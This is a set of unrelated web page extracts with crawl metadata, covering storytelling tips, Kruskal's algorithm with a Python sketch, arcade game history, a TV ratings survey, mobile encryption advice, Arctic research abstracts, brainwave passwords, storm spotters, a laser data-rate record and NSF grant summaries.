- In the United States, it is possible to patent an algorithm, including an Encryption Cipher. This can limit who can make such algorithms. | <urn:uuid:ff861609-c168-4c28-adb3-bed520f572f5> | CC-MAIN-2017-04 | http://hitachi-id.com/concepts/encryption.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280872.69/warc/CC-MAIN-20170116095120-00483-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.872299 | 175 | 3.890625 | 4 |
Jocelyn Bérard, M.Ps. MBA is the Vice President of International Leadership and Business Solutions (Vice-président Leadership et Solutions d’Affaires — Internationale) at Global Knowledge Canada
From the earliest cave dwellers to modern corporate executives, people have told stories to make a point. Using the magic of the narrative form, stories summarize complex information and transform it into communication that is both entertaining and memorable.
Stories are powerful because they speak to both reason and emotion. A good story is easy to remember, and the listener will want to tell it to others. Effective storytelling is a very powerful way to organize and think about information while engaging an audience in your message.
Structuring the Story
A powerful story makes the point quickly and effectively. If a story takes too long, the audience is lost. If it is too complex, the audience is confused. The power of a story in part depends on its simplicity. Powerful stories are visual stories. The listener can see the players, see the scene, and feel the tension that makes up the plot of your story.
The 4 P’s of a Powerful Story
To ensure that your story has impact and purpose, consider the following basic structure.
Purpose: Know why you are telling your story. This helps you:
- Focus on the essentials without bringing in unnecessary details.
- Ensure that you follow a logical flow so that the message does not have to be explained — everyone will get it the first time.
People: Talk about real characters. Describe the people so your audience can imagine them. Paint a picture in words. Use actual conversations.
Plot: Give your story a beginning, a middle, and an end. There needs to be tension for a story to work. Keep your story simple. It is not a novel.
Place: Place your story in a location that people can visualize. Give them enough visual cues so that they can put themselves in your story.
Consider the 4 P’s of a powerful story the next time you communicate with your team, your organization, or your clients and watch engagement in your message flourish. After all, storytelling is a great way to enhance your communication. | <urn:uuid:05a7781c-2487-4144-911e-2e73b509fd6e> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2012/06/21/the-4-ps-of-a-powerful-story/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00391-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920406 | 452 | 2.984375 | 3 |
0.4.5.2 Kruskal's Algorithm
Kruskal's algorithm for finding a minimal spanning tree in
a connected graph is a greedy algorithm; that is, given a
choice, it always processes the edge with the least weight.
This algorithm operates by considering edges in the graph in order of
weight from the least weighted edge up to the most while keeping track
of which nodes in the graph have been added to the spanning tree. If
an edge being considered joins either two nodes not in the spanning
tree, or joins a node in the spanning tree to one not in the spanning
tree, the edge and its endpoints are added to the spanning tree.
After considering one edge the algorithm continues to consider the
next higher weighted edge. In the event that a graph contains equally
weighted edges the order in which these edges are considered does not
matter. The algorithm stops when all nodes have been added to the spanning tree.
Note that, while the spanning tree produced will be
connected at the end of the algorithm, in intermediate steps
Kruskal can be working on many independent, non-connected
sections of the tree. These sections will be joined before
the algorithm completes.
Often this algorithm is implemented using parent pointers
and equivalence classes. At the start of the
processing, each vertex in the graph is an independent
equivalence class. Looping through the edges in order
of weight, the algorithm groups the vertices together
into one or more equivalence classes to denote that these
nodes have been added to the solution minimal spanning tree.
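A compact Python sketch of this parent-pointer approach is shown below, with the edge ordering handled by a min-heap as discussed in the next paragraph.

```python
# Kruskal's algorithm with parent pointers (union-find) for the equivalence
# classes and a min-heap to process edges in order of weight.
import heapq

def kruskal(num_vertices, edges):
    """edges: list of (weight, u, v) tuples; returns the tree edges."""
    parent = list(range(num_vertices))      # each vertex starts in its own class

    def find(v):                            # follow parent pointers to the root
        while parent[v] != v:
            parent[v] = parent[parent[v]]   # path compression
            v = parent[v]
        return v

    heap = list(edges)
    heapq.heapify(heap)                     # min-heap keyed on edge weight
    tree = []
    while heap and len(tree) < num_vertices - 1:
        w, u, v = heapq.heappop(heap)
        ru, rv = find(u), find(v)
        if ru != rv:                        # different classes: the edge joins them
            parent[ru] = rv                 # merge the two equivalence classes
            tree.append((u, v, w))
    return tree

print(kruskal(4, [(1, 0, 1), (4, 1, 2), (3, 0, 2), (2, 2, 3)]))
# -> [(0, 1, 1), (2, 3, 2), (0, 2, 3)]
```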
It is a good idea to process the edges by putting them into
a min-heap. This is usually much faster than sorting the
edges by weight since, in most cases, not all the edges will
be added to the minimal spanning tree. See the section on
the heapsort and the heap data structure
for more information about min-heaps. | <urn:uuid:3f735430-8f97-43d9-affe-33319f35e14d> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/alg/node95.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00025-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926253 | 409 | 3.5 | 4 |
Q. What was the first coin-operated arcade video game?
Arguably the golden age of arcade video games started somewhere in the mid 1970s and ended in the early 1980s. During that time, games like Space Invaders, Pac-Man, Galaga and Frogger were prevalent not only in video arcades but also in supermarkets, gas stations, restaurants and anywhere else business owners wanted to make some extra coinage. To find the first coin-operated arcade video game, we have to travel back a little farther.
In 1971, students at Stanford University set up the Galaxy Game, the earliest known coin-operated video game. Later that year, Computer Space was released and became the first mass-manufactured game. A year later, Pong went on to be the first game to reach mainstream popularity.
From a fistful of quarters to high limit action, check out how Evolution Gaming, the leading provider of live casino solutions, uses video conferencing to transform the way they do business. | <urn:uuid:ca71f5d8-9d9a-4289-81f3-49fd31965909> | CC-MAIN-2017-04 | http://www.lifesize.com/video-conferencing-blog/12-days-of-geek-day-6/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96103 | 205 | 2.53125 | 3 |
Today the TV Parental Guidelines Monitoring Board delivered key findings of a recent survey conducted on the TV Parental Guidelines to the Federal Communications Commission (FCC). More than 90 percent of parents say they are aware of the TV Parental Guidelines Ratings System, while over two-thirds say they use the ratings to manage their family TV viewing, according to this new study conducted on behalf of the Monitoring Board. The high visibility of the TV ratings and significant usage by parents demonstrate that the ratings system is providing a valuable resource to millions of U.S. families, representatives of the Monitoring Board said.
Public Opinion Strategies and Hart Research Associates conducted two Internet-based surveys. The first was a national survey of 1,001 parents of children 2 through 17 years old, conducted November 15 to 22, 2011. The second was a national survey of 500 teens, ages 13 to 17, conducted December 4 to 18, 2011. The samples for each survey are proportional to available census data for geographic region, gender, race and age. It assessed awareness, use and satisfaction with the guidelines.
Fifteen years ago, the television industry pledged to provide parents and caregivers with the essential information they need to help supervise television viewing in their homes. According to representatives of the Monitoring Board, this new research shows that parents have come to rely on the TV ratings system as a key tool in helping them monitor the shows their kids watch.
Among the top-line findings in the survey:
- 93 percent of parents and 82 percent of teens said they are aware of the TV ratings system
- 88 percent of parents and 81 percent of teens said they are aware that parental ratings for television programs appear on screen at the start of shows on broadcast and cable television
- 69 percent of parents view the TV ratings system favorably
- 68 percent of parents say they use the TV ratings system; the level of use peaks at 77 percent among parents of children who are 6 to 10 years old
- 69 percent of parents with a high school or less-than-high-school education, and 70 percent of parents with college experience less than the degree level, have used the TV ratings system
- 91 percent of African American parents, and 84 percent of Hispanic parents, said they find the TV ratings system helpful; and 77 percent of African American parents and 72 percent of Hispanic parents have used the TV ratings system to help make viewing decisions for their families
- 88 percent of parents were aware that the TV ratings system provides guidance based on the age of the child, and 82 percent of parents were aware that the TV ratings system provides information about the content of a program using letters (e.g., L for coarse language, V for violence, etc.)
- 67 percent of parents that subscribe to multichannel video services from a cable or satellite company are aware that their provider offers parental controls
- 36 percent of parents use either a V-Chip or cable/satellite-provided parental controls
The survey also indicated that many parents personally supervise television viewing in the home. Among the parents who report never having used parental controls, more than two-thirds of them said it was because “an adult is usually nearby when [their] children watch TV.”
Further information on key findings by the researchers is linked below.
One of the more ubiquitous devices of the modern era is the smartphone. We can do nearly everything on it, and as such it has played a large part in the blurring of the lines between work and life. While this is good for many businesses, many of these devices are largely unsecured, which can lead to problems, especially if the unsecured data is actually sensitive company information. One way to secure devices is through the use of encryption.
Encryption is not a new concept; it has probably been used since the inception of communication. In simple terms, it is the conversion of data into a form that can't be easily understood by unauthorized people. This form is referred to as ciphertext, or more commonly a cipher. Some people will call this a code, and the idea is similar, but a code is not meant to be secure and can be understood by other people, e.g., binary code, Morse code, etc.
When data is encrypted, it can be sent to recipients using normal transmission methods, e.g., Internet or data connections. Upon receipt, the encrypted data needs to be decrypted (changed back to normal data). Decryption on mobile, and most computerized, devices is done using a key. The key is fed to an algorithm that can translate between the encrypted and normal forms of the data, turning the ciphertext back into something we can read or interact with.
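As a rough illustration of that idea (using Python's third-party cryptography package; the message and variable names are made up for the example), the same key that scrambles the data is what translates it back:

from cryptography.fernet import Fernet

key = Fernet.generate_key()                    # the secret key; anyone holding it can decrypt
cipher = Fernet(key)

ciphertext = cipher.encrypt(b"Q3 projections - confidential")
plaintext = cipher.decrypt(ciphertext)         # translated back to readable data

print(ciphertext)                              # unreadable bytes without the key
print(plaintext)                               # b'Q3 projections - confidential'

Without the key, the ciphertext is just noise, which is why protecting the key matters as much as encrypting the data.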
Many businesses go to great lengths to ensure their data is encrypted within the network, when sent across it, and when sent to trusted recipients outside the network. In a perfect world, all of your connection points – devices that connect to the network – would be secure. In the real world, employees who use unencrypted mobile devices to store data or access company systems pose a big risk.
Take, for example, the CEO checking his work email on his own iDevice. Any emails sent between the company's email server and the phone's email program will usually be encrypted. However, when an attachment with confidential news about an upcoming merger is opened, a copy is usually downloaded onto the phone's memory. If the boss hasn't taken steps to encrypt the mobile device's memory and the phone is lost, then someone picking up the phone could turn it on and see this information. If that person can understand the information, they could create a ton of trouble for both companies involved.
Another scenario, one that’s becoming more popular, is where the company’s accountant has visited one of the increasingly popular drive-by-malware sites and malware has been installed on an unencrypted phone. The accountant might open work emails and download next quarter’s financial projections, along with a document containing the password to a newly reset work account. The phone’s memory is unencrypted, so the hacker who monitors the malware can come along and grab the information. Now, not only does the hacker have access to the system – through the password – they also have confidential numbers a competitor would likely pay a handsome sum for.
While these situations may seem extreme, they can and have happened. The risks can be minimized though. While the obvious answer to problems like this is to simply bar employees from accessing work systems from mobile devices, this solution runs counter to the way most people work, and will likely be largely ignored by nearly everyone.
The best solution lies in a mixture of different approaches, all centered around a solid mobile device usage plan. You should take steps to first figure out when your employees access office systems using a mobile device, why they are doing this and what are they accessing. From there it’s a good idea to look into security options, vendors like us can help you with this step. It’s also beneficial to establish a use policy that dictates when devices can and can’t be used. Also, utilizing apps to encrypt memory on phones will help. At the very least, it’s a good idea to encourage your employees to use a password on their phone.
Mobile device encryption should be an important part of your company’s security plan. If you’d like to learn more, or implement a security system please contact us as we may have a solution that meets your needs. | <urn:uuid:9351f36a-097a-4797-940f-ef3ee096cc2b> | CC-MAIN-2017-04 | https://www.apex.com/encrypt-mobile-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950591 | 886 | 3.28125 | 3 |
Day R.H.,ABR Inc. Environmental Research and Services |
Rose J.R.,ABR Inc. Environmental Research and Services |
Prichard A.K.,ABR Inc. Environmental Research and Services |
Streever B.,BP Exploration Alaska Inc.
Arctic | Year: 2015
We studied movement rates and the general flight behavior of bird flocks seen on radar and recorded visually at Northstar Island, Arctic Alaska, from 13 to 27 September 2002. Most of this period (13 - 19 and 21 - 27 September) had no gas-flaring events, but a major gas-flaring event occurred on the night of 20 September. Movement rates of targets on radar and of bird flocks recorded visually in the first ~50%-60% of the night were much lower during the non-flaring period than during the night of flaring, whereas rates in the last ~40%-50% of the night were similar in all periods. The general flight behavior of birds also differed significantly, with higher percentages of both radar targets and bird flocks exhibiting straight-line (directional) flight behaviors during the non-flaring periods and higher percentages of radar targets and bird flocks exhibiting non-straight-line (erratic and circling) flight behaviors during the gas-flaring period. During the night of gas flaring, the bright illumination appeared to have an effect only after sunset, when flocks of birds circled the island after being drawn in from what appeared to be a substantial distance from the island. On both radar and visual sampling, the number of bird flocks approaching the island declined over the evening, and the attractiveness of the light from flaring appeared to decline. The visibility of the moon appeared to have little effect on the behavior of birds. Because illumination from extensive gas-flaring is such a strong attractant to migrating birds and because most bird flocks fly at low altitudes over the water, flaring booms on coastal and offshore oil-production platforms in Arctic Alaska should be positioned higher than the mean flight altitudes of migrating birds to reduce the chances of incineration. © The Arctic Institute of North America. Source
Wood A.,BP Exploration Alaska Inc. |
Renouf G.,Saskatchewan Research Council
Society of Petroleum Engineers - SPE Heavy Oil Conference Canada 2014 | Year: 2014
Heavy oil waterfloods have been operating in the petroleum industry for more than fifty years. Over this time, many researchers have tried to identify flood management practices that would optimize recovery from these waterfloods. This multidisciplinary work ties simulation with the evaluation of field statistical results to determine the best operating practices for heavy oil reservoirs that have high permeability thief zones. The particular type of thief zone of concern in Alaskan heavy oil waterfloods is called a Matrix Bypass Event, or MBE. An MBE is a dramatic water breakthrough event in the form of a direct connection between the injector and producer whereby the waterflood process ceases and the injection water cycles directly to the producer without sweeping the matrix. This study evaluates operating strategies for reservoirs where MBEs have developed, taking into account the effects and interdependencies of pre-production, Voidage Replacement Ratio (VRR), and oil viscosity. Statistics from 30 Canadian heavy oil waterfloods were evaluated according to whether the VRR declined or rose compared to the previous month. Those that declined showed better oil recovery, particularly for the heavier oils. This finding laid the foundation showing that an operational practice called Cyclic Injection/Production would be beneficial, especially for heavy oil waterfloods. Cyclic Injection/Production alternates active injection while production is shut in, followed by active production while injection is shut in. Simulation was performed with a 3-D compositional finite difference reservoir model based on a heavy oil reservoir in Alaska's North Slope. The simulation confirmed that optimal waterflooding practices for heavy oils are significantly different from optimal practices for light oil waterfloods. The best practices also varied according to whether the waterflood had developed an MBE. As long as no MBEs are present and the producers are not bottomhole pressure limited, VRR of less than 1.0 and continuous injection are recommended. For heavy waterfloods that have high perm thief zones, however, Cyclic Injection/Production and a VRR of less than 1.0 improve recovery. Source
Svedeman S.J.,Southwest Research Institute |
Brady J.L.,BP Exploration Alaska Inc.
Proceedings - SPE Annual Technical Conference and Exhibition | Year: 2013
Laboratory tests were conducted to evaluate the effectiveness of oil/water separation in a deviated well casing that is located below the perforation intervals. Downhole water separation and reinjection is needed to reduce well operating costs associated with producing large amounts of water to the surface. In the casing separator, produced water flows downward from the well perforations with entrained oil buoyantly separated to the topside of the casing. A dip tube, running to the bottom of the casing, feeds a downhole pump that pumps the water into another level in the reservoir. A test facility was constructed to test the casing separator performance at a variety of well inclination angles, production flow rates, water cuts, and reinjection water flow rates. At each operating condition, the amount of oil entrained in the reinjection water was measured to determine the maximum amount of water that could be separated and still provide "clean" water to the downhole pump. Tests were conducted over well inclination angles from 18° to 75°. The maximum water velocity in the casing separator, for clean water, varied from 0.2 ft/sec to 0.4 ft/sec. The test results provided the information needed to determine how much water could be separated in the casing separator. With the separator performance data, the economics of reinjecting water with a downhole pump could be evaluated. Copyright 2013, Society of Petroleum Engineers. Source
Cater T.C.,Inc. Environmental Research and Services |
Hopson C.,UMIAQ |
Streever B.,BP Exploration Alaska Inc.
Arctic | Year: 2015
Tundra sodding, a new technique available to rehabilitate disturbed wetlands in the Arctic, is based on Iñupiaq traditional knowledge. C. Hopson, an Iñupiaq elder from Barrow and author of this paper, guided the development and field application of this new technique by providing traditional knowledge he learned as a youth from his elders. Tundra sodding has several advantages over other land rehabilitation techniques, the most important being that it can establish a mature plant community of indigenous species in a single growing season. In all sampling years, the plant communities at sodded sites were dominated by two rhizomatous graminoids, Eriophorum angustifolium and Carex aquatilis. These sedges also were dominant in all years in reference tundra. Also common to the plant communities in both reference tundra and sodded sites were 18 other vascular species (grasses, evergreen and deciduous shrubs, and forbs). Results from two to five growing seasons indicate that tundra sod can reduce the overall subsidence due to thawing of shallow permafrost. We harvested sod on three occasions from an area slated for gravel mining. In the summers of 2007 and 2008, we transplanted 334 m2 of tundra sod to portions of three sites to test the feasibility of the method. In summer 2010, we used the experience gained from that work to rehabilitate an entire site (1114 m2). This tundra sodding technique is labor intensive and costly compared to other rehabilitation techniques, but it offers advantages that justify its use when rapid rehabilitation of a disturbed site is needed. © The Arctic Institute of North America. Source
Johnson M.O.,BP Exploration Alaska Inc. |
Milne J.R.,Baker Hughes Inc.
SPE/IADC Drilling Conference, Proceedings | Year: 2012
Since 1994 Coiled Tubing Drilling (CTD) has completed over 650 sidetracks on the North Slope of Alaska. In many aspects the window milling and drilling phase can be considered a mature technology. However, recent developments in the completion phase namely with the generation II side exhaust liner running tool (Gen II SELRT) have further increased job reliability, safety, and efficiency for the liner cementing completion phase. This paper will begin with a brief update on the status of CTD on the North Slope (3 rigs drilling on a daily basis) and discuss how many of the challenges with drilling through/below the production tubing have been dealt with. The cost for a CTD sidetrack with an equivalent amount of reservoir exposure and zonal isolation is about one half that of a rotary sidetrack on the North Slope. This is due to efficiencies in leaving the production tubing in place (dominant savings) and less consumables. In addition, CTD's enhanced capability for underbalanced drilling (UBD) and managed pressure drilling (MPD) make it attractive for some North Slope fields. While the electronically controlled drilling bottomhole assembly (BHA) has improved drilling performance, the electric line (EL) inside the CT has challenged the completion phase. CT wiper darts for separating cement from displacement fluid can no longer be used. The CT wiper dart would be damaged by the EL and visa versa. Instead, the new liner running tool discussed in this paper exhausts the contaminated cement/mud interface to the annulus at top of liner before launching the liner wiper plug (LWP). Over 76 liners have been cemented with the side exhaust technique. The last 34 jobs have been done with the Gen II SELRT that uses mechanical dogs to close the path through the LWP, side exhaust, and launch the LWP when desired. This new tool increases job efficiency over the first generation tool and continues to provide reliable liner cementing with EL in the coil. Copyright 2012, IADC/SPE Drilling Conference and Exhibition. Source | <urn:uuid:e483271b-5a81-4fbd-bff1-fd2002d83fb9> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/bp-exploration-alaska-inc-41783/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93942 | 2,098 | 2.75 | 3 |
DARPA wants smarter ways to measure brain activity
WHAT: The human brain has on average 86 billion neurons, according to the best estimates. DARPA is asking researchers if it might be possible to detect brain activity in a single neuron, from a distance, using (in the finest tradition of Defense-agency euphemisms) "non-invasive technologies."
WHY: DARPA doesn't have a specific outcome or type of solution in mind, per its recent solicitation. Instead, the agency is seeking "an entirely new way of sensing neural activity" in moving, awake humans. The agency is interested in potential advances across a range of disciplines, from identifying untapped avenues of neural signals, new physical markers for detecting brain activity, more precise, fine-tuned neural sensors, or computational models that can detect and track the output of single neurons. Anything surgical or requiring anesthesia is out, but there is room for research on methods of physically tracking of brain activity "through ingestible or peripherally injectable routes."
DARPA is hoping for responses from physicists, engineers, astronomers and others with experience in remote sensing technology -- not simply responses from neuroscientists. But anything on the order of a science fiction-like brain ray would have to meet a few modest requirements, including not exceeding "acceptable and safe levels of tissue heating or exposure to electric/magnetic fields or doses of particles."
Click here to read the full solicitation.
Posted by Adam Mazmanian on Aug 26, 2014 at 11:17 AM | <urn:uuid:0747098c-ec74-4d99-95b3-f4a7f7734302> | CC-MAIN-2017-04 | https://fcw.com/blogs/the-spec/2014/08/darpa-neural-signals.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00355-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.918136 | 308 | 2.546875 | 3 |
In the not-crazy-distant future, instead of using a password to navigate our digital lives, we may be able to think our way into our various online services and ever-growing array of digital whatnots.
Researchers at the University of California-Berkeley's School of Information claim to have devised a method to use biosensors to accurately differentiate the brainwaves of specific subjects as they visualized songs, images, or other mental tasks. The brain activity resulting from these tasks appear to be inherent to each individual and may one day supplant traditional (and hackable) password security systems.
The researchers used a commercially available EEG reader that retails for less than $100 from NeuroSky. The Bluetooth-enabled device uses a "dry connection" via a sensor placed on the forehead. It kind of resembles a hands free wraparound phone headset, except that the microphone is snuggled against your forehead rather than in front of your mouth. According to NeuroSky's site, while their device cannot sense specific neurons firing-off, they can register "a dominant mental state, driven by collective neuron activity."
Test subjects were asked to perform various mental tasks such as focusing on their breathing, imagining their finger moving up and down, or listening to an audio tone while concentrating on a dot. Each subject also had their brain activity measured while performing personalized mental tasks such as visualizing a repetitive motion from a familiar sport, silently singing a song of their choice, or focusing on a thought of their choosing for 10 seconds.
The team claims that by customizing an "authentication threshold" for each user, they were able to keep error rates under 1 percent.
Biometrics haven't taken off
While manufacturers have experimented with various forms of biometric identification, they have yet to become widely adopted due to cost, lack of speed, and perhaps even the public's latent fears of how that information might be used in a future Skynet dystopia. (Biometrics have, however, been openly embraced by nations like India, which hopes to log biometric information on more than a billion of its residents).
This brainwave or "passthought" technology--in its current state--would appear to take too long to be practical for many daily tasks. However, if it proves to be accurate, then it may be useful for seldom-used tasks that are only accessed sporadically.
If future versions of smartphones or other wearable tech (which we already readily paste to our heads) gain the ability to read EEGs--and individual brain activity could be established accurately and reliably in under five seconds--this may be a first biometric scheme to become widespread.
The public will likely learn to embrace a system that does away with the contemporary password-centric security scheme. Our modern lives are stuffed full with too many passwords. We need them to access everything from our tablets to our Twitter. If you're at all concerned with hackers rifling through your all your private digital doings (as you should be), then your passwords for all your services should be unique should one service become corrupted. Furthermore, each unique password should be filled with all manner of not-easily-guessable keyboard nonsense like strange l3tters and n0mber combinations, unexpected CapiTAlizaTion schemES, and non-typical ch@racter$. While certainly more secure, they may not be easy to keep track of.
Our growing dependence on automation and the virtual world only promises to make our password security schemes more difficult. Once our digital lives gain the ability to recognize us reliably, affordably and quickly; the public will readily learn to embrace the password-free lifestyle. | <urn:uuid:ba55dce0-322a-4db0-8ad9-7f2396b78421> | CC-MAIN-2017-04 | http://www.csoonline.com/article/2133190/data-protection/mind-over-matter--researchers-turn-thoughts-into-passwords.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00016-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948212 | 753 | 2.984375 | 3 |
It is not uncommon for Texas to experience drastic weather changes, but helping communities stay vigilant when a storm develops makes all the difference in protecting lives and property.
To that end, the National Weather Service created the volunteer program Skywarn, which relies on trained storm spotters to provide it with accurate weather information.
Spotters are the eyes on the skies and feet on the ground for the NWS, identifying and observing tornadoes, severe thunderstorms and other hazardous weather conditions as they develop.
"They help us by providing timely and accurate weather reports any time there are storms in our area," said Hector Guerrero, meteorologist for the NWS in San Angelo. "We include their reports in our warnings and follow-ups to the public."
The San Angelo NWS covers 24 counties and has more than 1,500 trained spotters. Skywarn has more than 290,000 spotters nationwide.
The NWS talks with spotters, some of whom are licensed ham radio operators, and exchanges information to send out weather warnings and watches.
"This information helps save lives," Guerrero said.
The NWS reports an average of 10,000 severe thunderstorms, 5,000 floods and more than 1,000 tornadoes yearly across the U.S.
Steve Mild, emergency management coordinator for Tom Green County, has been a spotter for 15 years and knows firsthand how important the job is in a weather-related emergency.
"They're critical," Mild said. "Radar gives the weather service kind of an idea, but it's not specific real-time [information]."
Mild said the NWS benefits from spotters because it is able to compare information received from its Doppler radar to weather conditions being reported.
"A tornado doesn't just fall out of the sky," Mild said. "Things happen before -- heavy rain, hail and winds pick up." Spotters provide "exact weather conditions in real time."
The NWS annually offers a free spotter training course. This year's course is sponsored by the Amateur Radio Emergency Service just in time for Severe Weather Awareness Preparedness Week, which ends Saturday.
The course is from 9 a.m. to noon Saturday at Trinity Lutheran Church and is open to the public.
"The training is going to tell the audience what to look for in the sky and what part of the storm they really need to watch to interpret what they are seeing," said Matt Healy, public information officer for the San Angelo Amateur Radio Club. "What surprises most people is it's not looking at a cloud and telling the weather service, 'I have hail here.' It's watching the storm over a few minutes, or 10 to 15 minutes, because the characteristics totally change."
Healy said correctly identifying cloud formations is key to providing the NWS with accurate information that can help save lives.
"The class actually teaches the participants where in the storm they are going to find these clouds," Healy said. "When you call the weather service with a storm report, you always identify yourself as a trained storm spotter because your report is a whole lot more valid than someone just calling in saying, 'Well, I think I see something.' "
Spotters and ham radio operators volunteer their time keeping track of hazardous weather conditions, but they are not to be confused with storm chasers, Healy said.
"We don't chase storms, and we take safety very seriously," Healy said.
Safety is a priority for all spotters who volunteer their time and incur expenses.
The NWS is able to track spotters and ham radio operators who are out in the field to warn them if and when hazardous weather poses a threat.
Costs depend on how much the spotter chooses to spend on equipment, gas and travel expenses, said David Eaton, who has been a storm spotter for more than 30 years.
"We don't make money doing it," Eaton said. "It's a passion and a hobby."
Eaton said that despite the dangers, he takes pleasure in the results.
"It can be very rewarding to help a community stay safe," Eaton said. "It's also rewarding to see what Mother Nature can and has produced."
(c)2014 the San Angelo Standard-Times (San Angelo, Texas) | <urn:uuid:eb7d2e48-5c2c-4d4c-99e1-a248e947cfe1> | CC-MAIN-2017-04 | http://www.govtech.com/em/disaster/Storm-Spotters-Weather-Safety.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00044-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964093 | 882 | 2.546875 | 3 |
The UK, with average broadband speeds of just 6.2 Mbps, is looking on enviously as tests with new laser technology resulted in a new record speed of 26 Tbps.
Researchers have achieved a new record for data transfer rate using a single laser. The results published in the Nature Photonics journal show data transfer reaching a staggering rate of 26 terabits per second (Tbps). At this new record speed rate you could download around 100 Blu-ray quality movies in less than a second.
The method uses a system known as “fast Fourier transform” to separate more than 300 colours of light in the laser beam and encode each with its own string of information. Faster speeds have already been achieved. However, these higher speeds require the presence of 370 lasers, which, according to report co-author Wolfgang Freude, “fill racks and consume several kilowatts of power.”
The new technique was devised by Professor Freude and colleagues. They created comparable data rates using a single laser with shorter pulses, which contain colours of light known as a “frequency comb”. However, current methods to separate these colours do not work, so in this experiment the team sent their signals down 50 km of optical cable and used a fast Fourier transform to separate the data streams.
Professor Freude himself concedes that the current design is a highly complex one, so it is unlikely to be a competitor to high speed business broadband services for many years yet. However, work is progressing on silicon photonics which will enable the technology to be integrated on to a chip and enable mass market consumption.
Agency: NSF | Branch: Standard Grant | Program: | Phase: | Award Amount: 173.25K | Year: 2013
When large mammalian predators are extirpated or hunting pressure from humans is insufficient, mammalian herbivores like white-tailed deer increase in density, exerting increased pressure on plant communities. Though such effects are well-documented, it remains untested how herbivore-induced changes in vegetation ricochet back up the new food chain in these altered plant communities. Making use of a unique long-term experiment where deer density was manipulated in large enclosures, preliminary data demonstrate that deer density during stand initiation (the first 10 yr following clear cut) causes significant legacy effects in forest canopies, including trees, insects, and birds, lasting at least 30 years. The current project investigates mechanisms by which this legacy operates from scales ranging from stand to individual tree to individual prey item. Preliminary data provide support for mechanisms such as reduced foliage density, reduced prey base per unit foliage, and reduced prey quality at high deer density, all due to stand-scale changes in tree species dominance caused by deer. New investigations in these stands include bird foraging observations and bird exclusion experiments to examine at what scale and by what mechanisms birds respond to changes in forest vegetation caused by historic deer browsing.
Results from this study are relevant to the ca. 30% or more of eastern US counties where deer are over-abundant. Findings will be disseminated directly to state, federal, and tribal land managers via training programs coordinated by the USDA Forest Service Northern Research Station. The project will broaden participation by under-represented minorities in three ways. First, the PI is Native American, a group that is under-represented in STEM disciplines, particularly so in ecology. Second, the PI will provide mentorship via Indiana University of Pennsylvania's McNair program, a research mentorship program for undergraduates from under-represented groups interested in pursuing a PhD. Third, the PI will work with IUP students to establish a SEEDS chapter, a program of the Ecological Society of America that seeks to enhance opportunities for students from under-represented groups to pursue careers in ecology.
Agency: NSF | Branch: Standard Grant | Program: | Phase: FIELD STATIONS | Award Amount: 347.78K | Year: 2014
Carnegie Institute is awarded a grant to build a modern technical field laboratory to augment the research capacity of Powdermill Nature Reserve, the ecological research field station of the Carnegie Museum of Natural History, Pittsburgh. At Powdermill, current research programs include such topics as the occurrence of avian influenza in migratory birds, nonlinear boundary effects on decomposition in forensic entomology, regional sampling of water chemistry to assess health and quality, terrestrial toxicology and flow of metals into the ecosystem via pollen and nectar, as well as extensive and diverse programs related to forest succession. Modern ecologists use technical laboratory methods more than they did formerly, and leading field stations must provide support for such procedures. Increasing the capacity of the Powdermill field station will strongly accelerate research in the diverse programs already executed at Powdermill, and lead to additional programs in the future. These investments will help the facility to provide a leading research platform for the central Appalachians, one of the most diverse temperate ecosystems on Earth.
The proposed addition will provide a standard wet laboratory with hood, sinks, centrifuges, heat blocks, refrigeration, freezers (including -80C), balances, electrophoresis gel rigs, and all the ordinary lab ware and starting materials typical of a basic laboratory capable of tissue preservation, DNA extraction, incubation, restriction digests, gel electrophoresis, and other such procedures. Investment into a modern laboratory will contribute to expanded use by visiting researchers and formal college and university classes. In 2012 and 2013, eight federally funded projects were executed in part at Powdermill, including work by four PIs with NSF funding. About 40 researchers and professors use this station, and building a support facility will significantly improve research and teaching capacity in this region and beyond, and have a great multiplier effect in the local community. For more information about the Powdermill Nature Reserve, visit the website at http://www.carnegiemnh.org/powdermill/.
